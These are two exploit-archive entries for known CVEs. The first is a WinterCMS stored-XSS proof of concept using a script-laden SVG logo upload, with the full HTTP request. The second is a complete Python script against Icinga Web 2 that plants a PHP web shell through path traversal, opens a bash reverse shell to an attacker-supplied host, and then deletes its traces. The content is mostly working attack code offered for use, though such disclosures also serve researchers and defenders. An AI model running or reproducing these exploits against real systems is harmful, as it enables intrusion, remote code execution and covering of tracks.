<pre><code># Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting<br /># Exploit Author: abhishek morla<br /># Google Dork: N/A<br /># Date: 2023-07-10<br /># Vendor Homepage: https://wintercms.com/<br /># Software Link: https://github.com/wintercms/winter<br /># Version: 1.2.2<br /># Tested on: windows64bit / mozila firefox <br /># CVE : CVE-2023-37269<br /># Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3<br /># Video POC : https://youtu.be/Dqhq8rdrcqc<br /><br />Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality<br /><br />Description :<br />WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script<br /><br />Payload:- <br />// image.svg<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.cookie);<br /> </script><br /></svg><br /><br />//Post Request<br /><br />POST /backend/system/settings/update/winter/backend/branding HTTP/1.1<br />Host: 172.17.0.2<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: application/json<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Cache-Control: no-cache<br />X-Requested-With: XMLHttpRequest<br />X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2<br />X-WINTER-REQUEST-HANDLER: formLogo::onUpload<br />Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206<br />Content-Length: 608<br />Origin: http://172.17.0.2<br />Connection: close<br />Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D<br /><br />-----------------------------186411693022341939203410401206<br />Content-Disposition: form-data; name="file_data"; filename="image.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.domain);<br /> </script><br /></svg><br /><br />-----------------------------186411693022341939203410401206--<br /><br /><br /><br />|-----------------------------------------EOF-----------------------------------------<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution <br /># Date: 8/07/2023<br /># Exploit Author: Dante Corona(Aka. cxdxnt)<br /># Software Link: https://github.com/Icinga/icingaweb2<br /># Vendor Homepage: https://icinga.com/<br /># Software Link: https://github.com/Icinga/icingaweb2<br /># Version: <2.8.6, <2.9.6, <2.10<br /># Tested on: Icinga Web 2 Version 2.9.2 on Linux<br /># CVE: CVE-2022-24715<br /># Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715<br /><br />import requests,argparse,re,random,string<br />from colorama import Fore,Style<br /><br />def letter_random():<br /> letras = string.ascii_lowercase<br /> character_random = random.choices(letras, k=6)<br /> return ''.join(character_random)<br /><br /><br />def users_url_password():<br /> parser = argparse.ArgumentParser(description='Descripción de tu programa.')<br /> parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima')<br /> parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user')<br /> parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password')<br /> parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP')<br /> parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT')<br /> args = parser.parse_args()<br /> url = args.url<br /> user = args.user<br /> password=args.password<br /> ip_attack = args.ip <br /> port_attack = args.port<br /><br /> return url,user,password,ip_attack,port_attack<br /><br />def login(url,user,password):<br /> try:<br /> login_url = url + "/icingaweb2/authentication/login"<br /> session = requests.Session()<br /> r = session.get(login_url)<br /> csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]<br /> data_post = {"username":user,<br /> "password":password,<br /> "CSRFToken":csrf_regex,<br /> "formUID":"form_login",<br /> "btn_submit":"Login"<br /> }<br /> response = session.post(login_url,data=data_post)<br /> if "Welcome to Icinga Web!" in response.text:<br /> print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.")<br /> r = session.get(login_url)<br /> else:<br /> print("[!]Failed to login.")<br /> exit(1)<br /> #return session,csrf_regex <br /> except requests.exceptions.InvalidURL:<br /> print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(")<br /> exit(1)<br /> return session,csrf_regex<br /><br />def upload_file(session,url,character_random,csrf_regex):<br /> webshell = f"""-----BEGIN RSA PRIVATE KEY-----<br />MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu<br />KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm<br />o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k<br />TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7<br />9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy<br />v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs<br />/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00<br />-----END RSA PRIVATE KEY-----<br /><?php system($_REQUEST["%s"]);?><br />"""%character_random<br /> upload_url = url + "/icingaweb2/config/createresource"<br /> r = session.get(upload_url)<br /> csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]<br /> data_post ={"type":"ssh",<br /> "name":"shm/"+character_random,<br /> "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php",<br /> "private_key":webshell,<br /> "formUID":"form_config_resource",<br /> "CSRFToken":csrf,<br /> "btn_submit":"Save Changes"<br /> }<br /> upload_response = session.post(upload_url,data=data_post)<br /> check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php")<br /> if check.status_code != 200 :<br /> print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(")<br /> exit(1)<br /> else:<br /> print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.")<br /> <br />def enable_module(session,url,character_random):<br /> url_module = url+"/icingaweb2/config/general"<br /> r_module = session.get(url_module)<br /> csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0]<br /> data_post = {"global_show_stacktraces":"0",<br /> "global_show_stacktraces":"1",<br /> "global_show_application_state_messages":"0",<br /> "global_show_application_state_messages":"1",<br /> "global_module_path":"/dev/shm/",<br /> "global_config_resource":"icingaweb2",<br /> "logging_log":"none",<br /> "themes_default":"Icinga",<br /> "themes_disabled":"0",<br /> "authentication_default_domain":"",<br /> "formUID":"form_config_general",<br /> "CSRFToken":f"{csrf_module}",<br /> "btn_submit":"Save Changes"<br /> }<br /> <br /> resul = session.post(url_module,data_post)<br /> #--------------------------------------------------<br /> url_enable = url +"/icingaweb2/config/moduleenable"<br /> r_enable = session.get(url_enable)<br /> csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0]<br /> data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"}<br /> resul_enable = session.post(url_enable,data_enable)<br /><br /><br />def reverse_shell(session,url,ip_attack,port_attack,character_random):<br /> reverse_url = url + "/icingaweb2/dashboard"<br /> reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}'<br /> reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &"<br /> reverse_response_one = session.get(reverse_exe_one)<br /> try:<br /> reverse_response_two = session.get(reverse_exe_two, timeout=5)<br /> except:<br /> print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence")<br /> <br /> remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}")<br /> disable_url = url + "/icingaweb2/config/moduledisable"<br /> r_disable = session.get(disable_url)<br /> csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0]<br /> data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"}<br /> response_disable = session.post(disable_url,data=data_disable)<br /><br /><br /><br />def disable_module(session,url,character_random):<br /> url_disable = url + "/icingaweb2/config/moduledisable"<br /><br /><br /><br />if __name__ == '__main__':<br /> character_random = letter_random()<br /> url,user,password,ip_attack,port_attack = users_url_password()<br /> session,csrf_regex = login(url,user,password) <br /> upload_file(session,url,character_random,csrf_regex)<br /> enable_module(session,url,character_random)<br /> reverse_shell(session,url,ip_attack,port_attack,character_random)<br /> <br /><br /></code></pre>